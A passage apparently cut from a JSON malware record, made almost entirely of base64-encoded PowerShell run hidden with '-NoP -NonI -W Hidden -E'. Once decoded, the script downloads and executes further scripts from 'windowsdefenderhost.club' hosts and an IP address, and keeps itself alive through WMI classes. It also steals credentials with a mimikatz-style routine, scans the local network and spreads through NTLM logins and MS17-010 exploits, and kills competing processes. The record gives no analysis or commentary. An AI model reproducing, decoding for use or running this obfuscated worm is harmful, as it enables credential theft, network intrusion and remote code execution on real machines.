0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAc